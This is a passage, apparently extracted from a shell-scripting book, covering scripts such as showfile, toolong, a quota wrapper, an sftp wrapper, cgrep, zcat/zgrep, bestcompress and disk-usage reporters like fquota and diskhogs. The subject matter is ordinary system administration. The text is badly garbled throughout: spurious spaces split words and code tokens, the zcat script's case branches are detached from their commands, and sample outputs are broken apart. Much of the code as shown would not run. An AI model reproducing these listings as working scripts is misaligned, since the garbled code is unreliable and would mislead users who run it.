most complex element in this script, however, is the invocation of s ed for lines longer than the specified length:
e ch o " $ lin e" | fm t | sed -e '1 s /^/ / ' - e '2 ,$ s/ ^ /+ / '
Lines greater than the maximum allowable length are wrapped with fm t (or its shell script replacement, Script #14). To
visually denote which lines are wrapped continuations and which are retained intact from the original file, the first line of
wrapped output has the usual two-space indent, but subsequent wrapped lines are prefixed with a plus sign and a
single space instead. Finally, the mor e program displays the results.

Running the Script


As with the previous script, you can run show f ile simply by specifying one or more filenames when the program is
invoked.

The Results
$ s how f ile r agg ed .txt
- -- --- - --- -- --- -- ---- ---- ----- - --- - - --- - - -- -- -- - -- -- - -- - -- -- - -- -F il e r a gge d. txt ( 7 li nes, 639 c har a c ter s , o wn ed by t a yl o r) :
- -- --- - --- -- --- -- ---- ---- ----- - --- - - --- - - -- -- -- - -- -- - -- - -- -- - -- -S o s h e s at on , with clo sed e y es, a nd h a lf b el i ev ed he r se lf in
W ond e rla nd , t ho ugh she knew s he h a d b u t t o op e n th e m a ga in , a nd
a ll w oul d cha ng e to dul l rea l ity - - the g ra ss w o ul d b e o nl y r us tl i ng
+ i n t h e w in d, an d th e po ol ri p pli n g to t he w av i ng o f t h e re e ds -- t he

r att l ing t eac up s wo uld chang e to t ink l i ng s he e p- be l ls , a nd th e


Q uee n 's sh ril l crie s to the v oic e of t h e sh ep h er d b oy - -a nd th e
s nee z e
o f t h e b ab y, th e sh riek of t h e G r y pho n , a nd a l l th e o t he r q ue er
+ n ois e s, wo uld c hang e (s he kn e w) t o th e co nf us e d cl a mo u r of th e b us y
+ f arm - yar d- -wh il e th e lo wing o f t h e ca t t le i n t he d i st a nc e w ou ld
+ t ake the p lac e of t he M ock T u rtl e ' s h e a vy s ob s .
- -- --- - --- -- --- -- ---- ---- ----- - --- - - --- - - -- -- -- - -- -- - -- - -- -- - -- --

#33 Wrapping Only Long Lines


One limitation of the fmt command and its shell script equivalent, Script #14, is that they wrap and fill everything they
encounter, whether it makes sense to do so or not. This can mess up email (wrapping your . si gn a tu re is not
good, for example) and many other input file formats.
What if you have a document in which you want to wrap just the long lines but leave everything else intact? With the
default set of commands available to a Unix user, there's only one possible way to accomplish this: Explicitly step
through each line in an editor, feeding the long ones to f mt one by one (for example, in vi you could move the cursor
onto the line in question and then use !$f mt to accomplish this).
Yet Unix has plenty of tools that can be combined to accomplish just what we seek. For example, to quickly scan a file
to see if any lines are too long:
a wk '{ if (l eng th ($0) > 7 2) { p rin t $0 } }'
A more interesting path to travel, however, is to use the $ # v arn a me construct in the shell, which returns the length
of the contents of whatever variable is substituted for v a rna m e .

The Code
# !/ bin / sh
# t ool o ng - Fee ds the fmt comm a nd o n ly t h os e li n es i n t h e in p ut s t re am th at ar e
#
l ong er th an the spe cifie d le n g th.
w id th= 7 2
i f [ ! -r "$ 1" ] ; th en
e cho "Us ag e: $0 fil enam e" >& 2 ; e x i t 1
fi
w hi le r ead i npu t
do
i f [ ${ #in pu t} - gt $ width ] ; t hen
ech o "$i np ut" | fm t
e l se
ech o "$i np ut"
fi
d one < $ 1
e xi t 0

How It Works
The method of processing the input file in this script is interesting. Notice that the file is fed to the wh il e loop with a
simple < $ 1 and that each line can then be analyzed by reading it with re a d i np ut , which assigns the i np u t
variable to each line of the file.
If your shell doesn't have the ${ #var } notation, you can emulate its behavior with wc :
v ar len g th= "$ (ec ho "$v ar" | wc - c)"
However, wc has a very annoying habit of prefacing its output with spaces to get values to align nicely in the output
listing. To sidestep that pesky problem, a slight modification, which lets only digits through the final pipe step, is
necessary:
v ar len g th= "$ (ec ho "$v ar" | wc - c | s ed ' s /[ ^: di g it :] / /' ) "

Running the Script


This script accepts exactly one filename as its input.

The Results
$ t ool o ng ra gge d. txt

S o she sat o n, wi th c lose d eye s , a n d ha l f b el ie v ed h e rs e lf i n


W on der l and , tho ug h sh e kn ew sh e ha d but t o op en th em ag a in , a nd
a ll wo u ld ch ang e to d ull reali t y-- t h e g r a ss w ou l d be on l y ru s tl in g
i n the win d, an d the pool ripp l ing t o t h e w av in g o f t he re ed s -- th e
r at tli n g t ea cup s woul d ch ange t o t i n kli n g s he ep - be ll s , a nd t h e
Q ue en' s sh ri ll cr ies to t he vo i ce o f th e sh ep he r d bo y -- a nd t h e
s ne eze
o f the bab y, th e shri ek o f the Gry p h on, a nd a ll th e o th e r qu e er
n oi ses , wo ul d c ha nge (she knew ) to t he c o nf us ed cl am o ur of t h e bu s y
f ar m-y a rd- -w hil e the lowi ng of the c att l e i n th e d is t an c e wo u ld
t ak e t h e p la ce of the Moc k Tur t le' s hea v y s ob s.
Notice that, unlike a standard invocation of fmt , to o l ong has retained line breaks where possible, so the word
"sneeze," which is on a line by itself in the input file, is also on a line by itself in the output.

#34 Emulating GNU-Style Flags with Quota


The inconsistency between the command flags of various Unix systems is a perpetual problem and causes lots of grief
for users who switch between any of the major releases, particularly between a commercial Unix (Solaris, HP-UX, and
so on) and an open source Linux system. One command that demonstrates this problem is q uo ta , which supports
full-word flags on some Unix systems, while on others it accepts only one-letter flags.
A succinct shell script solves the problem, however, by mapping any full-word flags specified into the equivalent singleletter alternatives:
# !/ bin / sh
# n ewq u ota - A fr ont end to qu o ta t h at w o rk s wi t h fu l l- w or d f la gs a la GN U.
# q uot a ha s thr ee pos sibl e fla g s, - g , - v , a nd - q , bu t t h is s c ri pt
#
al l ows t hem t o be '-- group ' , ' - - ver b o se ', a n d '- - qu i et ' t oo :
f la gs= " "
r ea lqu o ta= "/ usr /b in/q uota "
w hi le [ $# - gt 0 ]
do
c ase $1
in
-- h elp

ec ho "U s age : $0 [ - -g ro up -- ve r bo s e -- q ui et -g vq ] " >& 2


ex it 1 ; ;
-- g rou p | - gr oup)
fl ags=" $ fla g s -g " ;
sh if t ; ;
-- v erb os e | - verb ose)
fla g s=" $ f lag s -v ";
sh if t ; ;
-- q uie t | - qu iet)
fl ags=" $ fla g s -q " ;
sh if t ; ;
-)
sh ift;
b re ak ; ;
*
)
br eak;
# do ne w i th ' w hi l e' l o op !
e sac
d on e
e xe c $ r eal qu ota $ flag s "$ @"

How It Works
Did you notice that this script accepts both single- and double-dash prefixes for full words, making it actually a bit more
flexible than the standard open source version, which insists on a single dash for one-letter flags and a double dash
for full-word flags? With wrappers, the sky's the limit in terms of improved usability and increased consistency across
commands.

Running the Script


There are a couple of ways to integrate a wrapper of this nature into your system. The most obvious is to rename the
base q u ota command, rename this script qu o ta, and then change the value of the r ea l qu ot a variable set at the
beginning of the script. But you can also ensure that users have a P AT H that looks in local directories before it looks in
the standard Unix binary distro directories (e.g., / u sr/ l o cal / bi n before /b i n and /u sr / bi n), which relies on
the safe assumption that each user's PAT H will see the script before it sees the real command. A third way is to add
systemwide aliases so that a user typing quot a actually invokes the ne wq u ot a script.

The Results
$ n ewq u ota - -ve rb ose
D is k q u ota s for u ser dtin t (ui d 24 8 1 0):
F i les ys tem
usa ge
quot a
l i mit
/ usr
3382 62
61440 0 6 7 5 840
$ n ewq u ota - qui et

g ra ce

fi l es
10 7 03

qu o ta
1 20 0 00

li mi t
1 26 00 0

g r ac e

The -q (quiet) mode emits output only if the user is over quota. You can see that this is working correctly from the last
result because I'm not over quota.

#35 Making sftp Look More Like ftp


The secure version of the file transfer protocol f t p program is included as part of s s h, the secure shell package, but
its interface can be a bit confusing for users who are making the switch from the crusty old f tp client. The basic
problem is that ftp is invoked as f tp r em o t eh o s t, and it then prompts for account and password information. By
contrast, sf tp wants to know the account and remote host on the command line and won't work properly (or as
expected) if only the host is specified.
To address this, a simple wrapper script allows users to invoke my s ft p exactly as they would have invoked the f t p
program, using prompts for needed fields.

The Code
#! /b in /s h
# my sf tp - M ake s sf t p s t a rt u p m o re l ik e ft p .
ec ho - n "Us e r a c cou n t : "
re ad a cc oun t
if [ - z $ac c oun t ] ; th e n
ex it 0 ;
# c h a ng e d t h e ir m in d , p r e su m ab l y
fi
if [ - z "$1 " ] ; th e n
ec ho - n " R emo t e h o s t: "
re ad h ost
if [ - z $ h ost ] ; t he n
ex it 0
fi
el se
ho st =$ 1
fi
# En d by sw i tch i ng t o s f t p. T he - C f l ag e na b le s co m p re s s io n he r e .
ex ec / us r/b i n/s f tp - C $ a c co u n t@ $ h os t

Running the Script


As with the ftp client, if users omit the remote host the script continues by prompting for a remote host, but if the script
is invoked as my s ftp rem o t eh o s t, the r e m ot e h os t provided is used instead.

The Results
First off, what happens if you invoke s f t p without any arguments?
$ sf tp
us ag e: s ftp [-v C 1] [ - b b a tc h f il e ] [ - o o p t io n ] [ - s s u bs y s te m | pa t h ] [ - B b uf f e r_ si ze]
[-F con f i g] [ -P d ir e c t s e rv e r p a th ] [- S pr o g ra m ]
[us e r@] h o st [ : fi l e [ f i le ] ]
Useful, but confusing. By contrast, invoke this script without any arguments and you can proceed to make an actual
connection:
$ my sf tp
Us er a cc oun t : t a ylo r
Re mo te h ost : in t uit i v e. c o m
Co nn ec ti ng t o i n tui t i ve . c om . . .
ta yl or @i ntu i tiv e .co m ' s p a ss w o rd :
sf tp > qu it
Invoke the script as if it were an ft p session by supplying the remote host, and it'll prompt for the remote account
name and then invisibly invoke s f tp :
$ my sf tp in t uit i ve. c o m
Us er a cc oun t : t a ylo r

Co nn ec ti ng t o i n tui t i ve . c om . . .
ta yl or @i ntu i tiv e .co m ' s p a ss w o rd :
sf tp > qu it

Hacking the Script


There's a trick in this script worth mentioning: The last line is an e xe c call. What this does is replace the currently
running shell with the application specified. Because you know there's nothing left to do after calling the sf t p
command, this method of ending our script is more efficient than having the shell hanging around waiting for s f tp to
end.
We'll revisit the s f tp command in Script #83, to see how it can be used to securely and automatically synchronize a
local and remote directory.

#36 Fixing grep


Some versions of g re p offer a remarkable variety of capabilities, including the particularly useful ability to show the
context (a line or two above and below) of a matching line in the file. Additionally, some rare versions of gr ep can
highlight the region in the line (for simple patterns, at least) that matches the specified pattern.
Both of these useful features can be emulated in a shell script, so that even users on older commercial Unixes with
relatively primitive gre p commands can enjoy them. This script also borrows from the ANSI color script, Script #11.

The Code
# !/ bin / sh
# c gre p - gr ep wi th c onte xt di s pla y and h ig hl ig h te d p at t er n m at ch e s.
c on tex t =0
e sc ="^ [ "
b On ="$ { esc }[ 1m" b Off= "${e sc}[2 2 m"
s ed scr i pt= "/ tmp /c grep .sed .$$"
t em pou t ="/ tm p/c gr ep.$ $"
f un cti o n s ho wMa tc hes
{
m atc h es= 0
e cho "s/ $p att er n/${ bOn} $patt e rn$ { b Off } / g" > $ s ed sc r ip t
f or l ine no in $ (gre p -n "$pa t ter n " $1 | c ut - d : -f 1 )
do
if [ $ co nte xt -gt 0 ] ; th e n
p rev =" $(( $l inen o - $cont e xt) ) "
i f [ " $(e ch o $p rev | cut -c1 ) " = " - " ] ; t he n
pr ev ="0 "
fi
n ext =" $(( $l inen o + $cont e xt) ) "

i f [ $ mat ch es - gt 0 ] ; t hen
ec ho "$ {p rev} i\\" >> $ s eds c r ipt
ec ho "- -- -" > > $s edscr i pt
fi
e cho " ${p re v},$ {nex t}p" > > $ s e dsc r i pt
el s e
e cho " ${l in eno} p" > > $se d scr i p t
fi
ma t che s= "$( ($ matc hes + 1)) "
d one
i f [ $ma tc hes - gt 0 ] ; then
se d -n - f $ se dscr ipt $1 | u niq | mo r e
fi

t ra p " / bin /r m - f $tem pout $sed s cri p t " E X I T


i f [ - z "$ 1" ] ; then
e cho "Us ag e: $0 [-c X] patte r n { f i len a m e} " >& 2 ; ex i t 0
fi
i f [ " $ 1" = "-c " ] ; then
c ont e xt= "$ 2"
s hif t ; s hi ft
e li f [ "$( ec ho $1 |cut -c1 -2)" = "- c " ] ; th en
c ont e xt= "$ (ec ho $1 | cu t -c3 - )"
s hif t
fi

p at ter n ="$ 1" ; s hi ft


i f [ $ # -g t 0 ] ; the n
f or f ile na me ; do
ec h o " -- --- $ file name ---- - "
sh o wMa tc hes $ file name
d one
e ls e
c at - > $t emp ou t
# save str e a m t o a te mp fi le
s how M atc he s $ te mpou t
fi
e xi t 0

How It Works
This script uses gre p -n to get the line numbers of all matching lines in the file and then, using the specified number
of lines of context to include, identifies a starting and ending line for displaying each match. These are written out to
the temporary se d script, along with a word substitution command (the very first ec ho statement in the
s ho wMa t che s function) that wraps the specified pattern in bold-on and bold-off ANSI sequences. That's 90 percent
of the script, in a nutshell.

Running the Script


This script works either with an input stream (in which case it saves the input to a temp file and then processes the
temp file as if its name had been specified on the command line) or with a list of one or more files on the command
line. To specify the number of lines of context both above and below the line matching the pattern that you specified,
use - c valu e, followed by the pattern to match.

The Results
$ c gre p -c 1 te ac up r agge d.txt
- -- -- r agg ed .tx t ---- i n the win d, an d the pool ripp l ing t o t h e w av in g o f t he re ed s -- th e
r at tli n g t ea cup s woul d ch ange t o t i n kli n g s he ep - be ll s , a nd t h e
Q ue en' s sh ri ll cr ies to t he vo i ce o f th e sh ep he r d bo y -- a nd t h e

Hacking the Script


A useful refinement to this script would return line numbers along with the matched lines.

#37 Working with Compressed Files


Throughout the years of Unix development, few programs have been reconsidered and redeveloped more times than
c o m p re ss . On most Linux systems there are three significantly different compression programs available:
c o m p re ss , g z ip, and b zip2 . Each has a different suffix, . Z , . g z , and . b z 2 , respectively, and the degree of
compression of the results can vary among the three programs, depending on the layout of data within a file.
Regardless of the level of compression, and regardless of which compression programs are installed, working with
compressed files on many Unix systems requires uncompressing them by hand, accomplishing the desired tasks, and
recompressing them when finished. A perfect job for a shell script!

The Code
# ! / b in /s h
# z c at , zmo r e, a n d zg r ep - Th i s s c r i p t s h o u l d b e e i t h e r s y m b o l i c a l l y
#
li nk ed o r ha r d li n ked to a l l t h r e e n a m e s - i t a l l o w s u s e r s t o w o r k w i t h
#
co mp res s ed f i les t rans par e n t l y .
Z = " co mp res s "; u nZ=" u ncom pre s s " ;
Zlist=""
g z = " gz ip "
; u n gz=" g unzi p"
; gzlist=""
b z = " bz ip 2"
; u n bz=" b unzi p2"
; bzlist=""
# F i rs t ste p is t o tr y and is o l a t e t h e f i l e n a m e s i n t h e c o m m a n d l i n e .
# W e 'l l do t his l azil y by ste p p i n g t h r o u g h e a c h a r g u m e n t , t e s t i n g t o
# s e e if it ' s a f ilen a me o r n o t . I f i t i s , a n d i t h a s a c o m p r e s s i o n
# s u ff ix , w e 'll u ncom p ress th e f i l e , r e w r i t e t h e f i l e n a m e , a n d p r o c e e d .
# W h en d one , we' l l re c ompr ess e v e r y t h i n g t h a t w a s u n c o m p r e s s e d .
f o r ar g
do
i f [ - f " $ arg" ] ; t hen
ca se "$ a rg" i n
* .Z) $unZ "$ar g "
arg= " $(ec h o $a rg | s e d ' s / \ . Z $ / / ' ) "
Zlis t ="$Z l ist \"$ a r g \ " "
;;
*. gz) $ung z "$a r g"
arg= " $(ec h o $a rg | s e d ' s / \ . g z $ / / ' ) "
gzli s t="$ g zlis t \ " $ a r g \ " "
;;
* .b z2) $unb z "$a r g"
arg= " $(ec h o $a rg | s e d ' s / \ . b z 2 $ / / ' ) "
bzli s t="$ b zlis t \ " $ a r g \ " "
;;
es ac
fi
n e wa rg s=" $ {new a rgs: - ""} \"$ a r g \ " "
done
c a s e $ 0 in
* z ca t* )
* z mo re * )
* z gr ep * )
*
)
esac

eval
cat $new arg s
;;
eval more $new arg s
;;
eval grep $new arg s
;;
echo "$0: unkn own b a s e n a m e . C a n ' t p r o c e e d . " > & 2 ; e x i t 1

# n o w re com p ress ever y thin g


i f [ ! - z " $ Zlis t " ] ; th en
e v a l $Z $Z l ist
fi
i f [ ! - z " $ gzli s t"] ; the n
e v a l $g z $ g zlis t
fi
i f [ ! - z " $ bzli s t" ] ; th en
e v a l $b z $ b zlis t
fi
# a n d do ne

exit 0

How It Works
For any given suffix, three steps are necessary: uncompress the file, rewrite the filename without the suffix, and add it
to the list of files to recompress at the end of the script. By keeping three separate lists, one for each compression
program, this script also lets you easily gre p across files compressed using multiple compression utilities.
The most important trick is the use of the ev a l directive when recompressing the files. This is necessary to ensure
that filenames with spaces are treated properly. When the Z l i s t , g z l i s t , and b z l i s t variables are instantiated,
each argument is surrounded by quotes, so a typical value might be " " s a m p l e . c " " t e s t . p l "
" p e n ny .j ar" " . Because the list has levels of quotes, invoking a command like c a t $ Z l i s t results in c a t
complaining that file " s ampl e .c" wasn't found. To force the shell to act as if the command were typed at a
command line (where the quotes are stripped once they have been utilized for a r g parsing), e v a l is used, and all
works as desired.

Running the Script


To work properly, this script should have three names. How do you do that in Unix? Simple: links. You can use either
symbolic links, which are special files that store the names of link destinations, or hard links, which are actually
assigned the same inode as the linked file. I prefer symbolic links. These can easily be created (here the script is
already called zcat):
$ l n - s zca t zmo r e
$ l n - s zca t zgr e p
Once that's done, you have three new commands that have a shared code base, and each accepts a list of files to
process as needed, uncompressing and then recompressing them when done.

The Results
The standard co m pres s utility quickly shrinks down r a g g e d . t x t and gives it a . Z suffix:
$ c o mp re ss r agge d .txt
With r ag ged . txt in its compressed state, we can view the file with z c a t :
$ z c at r agg e d.tx t .Z
S o s he s at o n, w i th c l osed ey e s , a n d h a l f b e l i e v e d h e r s e l f i n
W o n d er la nd, thou g h sh e kne w s h e h a d b u t t o o p e n t h e m a g a i n , a n d
a l l wo ul d c h ange to d u ll r eal i t y - - t h e g r a s s w o u l d b e o n l y r u s t l i n g
i n t he w ind , and the p ool rip p l i n g t o t h e w a v i n g o f t h e r e e d s - - t h e
r a t t li ng te a cups woul d cha nge t o t i n k l i n g s h e e p - b e l l s , a n d t h e
Q u e e n' s shr i ll c r ies t o th e v o i c e o f t h e s h e p h e r d b o y - - a n d t h e
s n e e ze o f t h e ba b y, t h e sh rie k o f t h e G r y p h o n , a n d a l l t h e o t h e r
q u e e r no ise s , wo u ld c h ange (s h e k n e w ) t o t h e c o n f u s e d c l a m o u r o f
t h e bu sy fa r m-ya r d--w h ile the l o w i n g o f t h e c a t t l e i n t h e d i s t a n c e
w o u l d ta ke t he p l ace o f th e M o c k T u r t l e ' s h e a v y s o b s .
And then search for "teacup" again:
$ z g re p tea c up r a gged . txt. Z
r a t t li ng te a cups woul d cha nge t o t i n k l i n g s h e e p - b e l l s , a n d t h e
All the while, the file starts and ends in its original compressed state:
$ l s - l rag g ed.t x t*
- r w - r- -r -1 ta y lor
staf f 4 4 3 J u l
7 16:07 ragged.txt.Z

Hacking the Script


Probably the biggest weakness of this script is that if it is canceled in midstream, the file is guaranteed to recompress.
This can be fixed with a smart use of the tr a p capability and a recompress function that does error checking. That
would be a nice addition.

#38 Ensuring Maximally Compressed Files


As highlighted in Script #37, most Unix implementations include more than one compression method, but the onus is on
the user to figure out which does the best job of compressing a given file. What typically happens is that users learn
how to work with just one compression program without ever knowing that they could attain better results with a
different one. Making this more confusing is that some files compress better with one algorithm and some with another,
and there's no way to know without experimentation.
The logical solution is to have a script that compresses files using each of the tools and then selects the smallest
resultant file as the best. That's exactly what be s t com p r ess does. By the way, this is one of my favorite scripts in
the book.

The Code
# !/ bin / sh
# b est c omp re ss - Give n a file, tri e s co m p re ss in g i t w it h a ll th e a va il a bl e
#
co m pre ss ion t ools and keep s th e com p r es se d f il e t ha t 's s m al le s t, r e po rt i ng
#
th e re su lt to the use r. I f '- a ' is n ' t sp ec i fi ed , b e st co m pr es s s ki p s
#
co m pre ss ed fi les in t he in p ut s t rea m .
Z =" com p res s"
gz=" gzip "
bz= " b zip 2 "
Z ou t=" / tmp /b est co mpre ss.$ $.Z"
g zo ut= " /tm p/ bes tc ompr ess. $$.gz "
b zo ut= " /tm p/ bes tc ompr ess. $$.bz "
s ki pco m pre ss ed= 1
i f [ " $ 1" = "-a " ] ; then
s kip c omp re sse d= 0 ; shif t
fi
i f [ $ # -e q 0 ] ; then
e cho "Us ag e: $0 [-a ] fi le or fil e s to o pt im al l y co m pr e ss " > &2 ; e xi t 1
fi
t ra p " / bin /r m - f $Zou t $g zout $ bzo u t " E X I T
f or na m e
do
i f [ ! - f "$n am e" ] ; t hen
ec h o " $0 : f il e $n ame not f o und . Ski p p ed ." > & 2
co n tin ue
fi
i f [ "$( ec ho $n ame | eg rep ' ( \.Z $ | \.g z $ |\ .b z2 $ )' )" != "" ] ; th e n
if [ $ sk ipc om pres sed -eq 1 ] ; t hen
e cho " Ski pp ed f ile ${nam e }: i t 's a l re ad y c om pr e ss e d. "
c ont in ue
el s e
e cho " War ni ng: Tryi ng to dou b l e-c o m pr es s $ na me "
fi
fi
$Z
< "$ na me" > $Zo ut
&
$ gz < "$ na me" > $gz out &
$ bz < "$ na me" > $bz out &
w ait # r un co mp ress ions in p a ral l e l f o r s pe ed . W ai t u n ti l a ll a r e do n e
s mal l est =" $(l s -l " $nam e" $Z o ut $ g zou t $b zo ut | \
a w k ' {p rin t $5"= "NR} ' | s o rt - n | c u t -d = - f2 | he a d -1 ) "
c ase "$s ma lle st " in
1 ) e ch o " No spa ce s aving s by c omp r e ss in g $ na me . L e ft a s i s. "
;;
2 ) e ch o B es t co mpre ssion is w i th c o mp re ss . F il e r e na me d $ {n a me }. Z

m v $Zo ut "${ name }.Z" ; rm - f " $ n am e"


;;
3 ) e ch o B es t co mpre ssion is w i th g z ip . Fi l e re n am e d ${ n am e} . gz
m v $gz ou t "$ {nam e}.gz " ; r m -f " $n am e"
;;
4 ) e ch o B es t co mpre ssion is w i th b z ip 2. F i le r e na m ed $ { na me } .b z2
m v $bz ou t "$ {nam e}.bz 2 " ; r m - f "$ na me "
e sac
d on e
e xi t 0

How It Works
The most interesting line in this script is
s mal l est =" $(l s -l " $nam e" $Z o ut $ g zou t $b zo ut | \
a w k ' {p rin t $5"= "NR} ' | s o rt - n | c u t -d = - f2 | he a d -1 ) "
This line has ls output the size of each file (the original and the three compressed files, in a known order), chops out
just the file sizes with awk , sorts these numerically, and ends up with the line number of the smallest resultant file. If
the compressed versions are all bigger than the original file, the result is 1, and an appropriate message is output.
Otherwise, sm al les t will indicate which of c o m pre s s , g z ip, or b zi p2 did the best job. Then it's just a matter of
moving the appropriate file into the current directory and removing the original file.
Another
$Z
<
$ gz <
$ bz <
w ai t

technique in
" $na me "
" $na me "
" $na me "

this script is worth pointing out:


> $ Zout
&
> $ gzou t &
> $ bzou t &

The three compression calls are done in parallel by using the trailing & to drop each of them into its own subshell,
followed by the call to w ait , which stops the script until all the calls are completed. On a uniprocessor, this might not
offer much performance benefit, but with multiple processors, it should spread the task out and complete quite a bit
faster.

Running the Script


This script should be invoked with a list of filenames to compress. If some of them are already compressed and you
desire to compress them further, use the - a flag; otherwise they'll be skipped.

The Results
The best way to demonstrate this script is with a file that needs to be compressed:
$ l s - l al ic e.t xt
- rw -r- - r-1 t ay lor
sta ff 1 5 487 2 Dec
4 2 00 2 a li c e. t xt
The script hides the process of compressing the file with each of the three compression tools and instead simply
displays the results:
$ b est c omp re ss al ice. txt
B es t c o mpr es sio n is w ith compr e ss. F ile r en am ed al ic e .t x t. Z
You can see that the file is now quite a bit shorter:
$ l s - l al ic e.t xt .Z
- rw -r- - r-1 t ay lor
whe el 6 6 287 J ul

7 1 7: 31 al ic e .t x t. Z

Chapter 5: System Administration: Managing Users


Overview
No sophisticated operating system can run itself without some human intervention, whether it's Windows, Mac OS, or
Unix. If you use a multiuser Unix system, someone no doubt is performing the necessary system administration tasks.
You might be able to ignore the proverbial "man behind the curtain" who is managing and maintaining everything, or
you might well be the All Powerful Oz yourself, the person who pulls the levers and pushes the buttons to keep the
system running. Even if you have a single-user system, like a Linux or Mac OS X system, there are system
administration tasks that you should be performing, whether you realize it or not.
Fortunately, streamlining life for Unix system administrators is one of the most common uses of shell scripting, and as a
result there are quite a few different shell scripts that sysadmins use, from the simple to the complex. In fact, there are
usually quite a few commands in Unix that are actually shell scripts, and many of the most basic tasks, like adding
users, analyzing disk usage, and managing the filespace of the guest account, can easily be done in relatively short
scripts.
What's surprising is that many system administration scripts are no more than 20 to 30 lines long, total. This can be
easily calculated on the command line for a given directory:
$ w c - l $( fi le /u sr/b in/* | gr e p " s c rip t " | g re p - v p er l | c u t -d : - f1 ) | \
s ort -n | hea d -15
3 /u sr /bi n/ bdft ops
3 /u sr /bi n/ font 2c
3 /u sr /bi n/ gsbj
3 /u sr /bi n/ gsdj
3 /u sr /bi n/ gsdj 500
3 /u sr /bi n/ gslj
3 /u sr /bi n/ gslp
3 /u sr /bi n/ gsnd
4 /u sr /bi n/ 4odb
4 /u sr /bi n/ 4xsl t
4 /u sr /bi n/ krdb
5 /u sr /bi n/ 4rdf
5 /u sr /bi n/ 4xup date
6 /u sr /bi n/ chec kXML
6 /u sr /bi n/ kdb2 html
None of the shortest 15 scripts in the /usr/ b in/ directory are longer than 6 lines. And at 14 lines, the Red Hat
Linux 9.0 script /u sr /bi n/ mute is a fine example of how a little shell script can really improve the user experience:
# ! /bi n /sh
# $ Aum i x: au mix /s rc/m ute, v 1.1 200 2 / 03/ 1 9 0 1: 09 : 18 t r ev o r Ex p $
# C opy r igh t (c) 2 001, Ben Ford and T rev o r J oh ns o n
#
# R un t his s cri pt to mute , the n ag a i n t o un -m ut e .
# N ote : it w ill c lobb er y our s a ved s ett i n gs .
#
v ol ume s =$( au mix - vq | tr - d ,)
i f [ $ ( ech o $vo lu mes | aw k '{p r int $ 2}' ) -n e 0 - o \
$( ec ho $v olum es | awk ' {pr i n t $ 3 } ') - ne 0 ]; th e n
au mi x - S -v 0
e ls e
au mi x - L > /d ev/n ull
fi
Like the mut e script, the scripts presented in this chapter are short and useful, offering a range of administrative
capabilities, including easy system backups, showing what system services are enabled through both i ne td and
x in etd , an easy front end to the da te command for changing the current date and time, and a helpful tool to
validate cro nta b files.

#39 Analyzing Disk Usage


Even with the advent of very large disks and their continual drop in price, system administrators seem to perpetually be
tasked with keeping an eye on disk usage to ensure that the system doesn't fill up.
The most common monitoring technique is to look at the /u s e rs or /h om e directory, using the d u command to
ascertain the disk usage of all the subdirectories, and then reporting the top five or ten users therein. The problem with
this approach, however, is that it doesn't take into account space usage elsewhere on the hard disk(s). If you have
some users who have additional archive space on a second drive, or sneaky types who keep MPEGs in a dot directory
in /tm p or in an unused and accidentally opened directory in the f tp area, they'll escape detection. Also, if you have
home directories spread across multiple devices (e.g., disks), searching each /h o me isn't necessarily optimal.
Instead, a better solution is to get all the account names directly from the / et c /p as s wd file and then to search the
file systems for files owned by each account, as shown in this script.

The Code
# !/ bin / sh
# f quo t a - D isk q uota ana lysis too l for U ni x.
#
A ssu me s th at a ll us e r a c c oun t s a re > = U ID 10 0 .
M AX DIS K USA GE =20
f or na m e i n $(c ut -d: -f1 ,3 /e t c/p a s swd | a wk - F : '$ 2 > 99 { p ri nt $1 }' )
do
e cho -n "U ser $ name exc eeds d isk q uot a . D is k u sa ge is : "
# Yo u mi gh t n ee d to mod ify t h e f o l low i n g li st of d i re c to ri e s to ma tc h
# th e la yo ut of you r di sk. M o st l i kel y ch an ge : / Us e rs to / h om e
f ind / / us r / va r /U sers -use r $n a m e - x d ev - ty p e f - ls | \
a wk '{ su m += $ 7 } END { pri n t su m / (1 02 4 *1 02 4 ) " M by t es " } '
d on e | awk " \$9 > $MA XDIS KUSAG E { p r int \ $0 } "
e xi t 0

How It Works
By convention, uids 1 through 99 are for system daemons and administrative tasks, while 100 and above are for user
accounts. Unix administrators tend to be a fairly organized bunch, and this script takes advantage of that, skipping all
accounts that have a uid of less than 100.
The -xd e v argument to the find command ensures that f i n d doesn't go through all file systems, preventing it from
slogging through system areas, read-only source directories, removable devices, the / pr o c directory of running
processes (on Linux), and similar areas.
It may seem at first glance that this script outputs an exceeds disk quota message for each and every account, but the
a wk statement after the loop allows reporting of this message only for accounts with usage greater than the predefined
M AX DIS K USA GE .

Running the Script


This script has no arguments and should be run as r oot to ensure access to all directories and file systems. The
smart way to do this is by using the helpful sud o command (see m an su do for more details). Why is su d o helpful?
Because it allows you to execute one command as r o ot, after which you are back to being a regular user. Each time
you want to run an administrative command, you have to consciously use s u do to do so; using s u - r oo t , by
contrast, makes you ro ot for all subsequent commands until you exit the subshell, and when you get distracted it's all
too easy to forget you are ro ot and then type a command that can lead to disaster.
Note You will likely have to modify the directories listed in the fi nd command to match the corresponding
directories in your own disk topography.

The Results

Because it's searching across file systems, it should be no surprise that this script takes rather a while to run. On a
large system it could easily take somewhere between a cup of tea and a lunch with your significant other. Here are the
results:
$ s udo fqu ot a
U se r l i nda e xce ed s di sk q uota. Dis k usa g e i s: 3 9 .7 M b yt e s
U se r t a ylo r exc ee ds d isk quota . Di s k us a g e is : 2 17 99 . 4 M by te s
You can see that ta yl or is way out of control with his disk usage! That's 21GB. Sheesh.

Hacking the Script


A complete script of this nature should have some sort of automated email capability to warn the scofflaws that they're
hogging disk space. This enhancement is demonstrated in the very next script.

#40 Reporting Disk Hogs


Most system administrators seek the easiest way to solve a problem, and the easiest way to manage disk quotas is to
extend the fq uo ta script, Script #39, to include the ability to email warnings directly to users who are consuming too
much space.

The Code
# !/ bin / sh
# d isk h ogs - Di sk quo ta a nalys i s t o o l f o r U ni x; as su m es al l u se r
#
ac c oun ts ar e >= U ID 1 00. E m ail s mes s a ge t o e ac h v io l at in g u se r
#
an d re po rts a sum mary to t h e s c r een .
M AX DIS K USA GE =20
v io lat o rs= "/ tmp /d iskh ogs0 .$$"
t ra p " / bin /r m - f $vio lato rs" 0
f or na m e i n $(c ut -d: -f1 ,3 /e t c/p a s swd | a wk - F : '$ 2 > 99 { pr in t $ 1 } ')
do
e cho -n "$ nam e "
# Yo u mi gh t n ee d to mod ify t h e f o l low i n g li st of d i re c to ri e s to ma tc h
# th e la yo ut of you r di sk. M o st l i kel y ch an ge : / Us e rs to / h om e
f ind / / us r / va r /U sers -use r $n a m e - x d ev - ty p e f - ls | \
a wk '{ su m += $ 7 } END { pri n t su m / (1 02 4 *1 02 4 ) } '
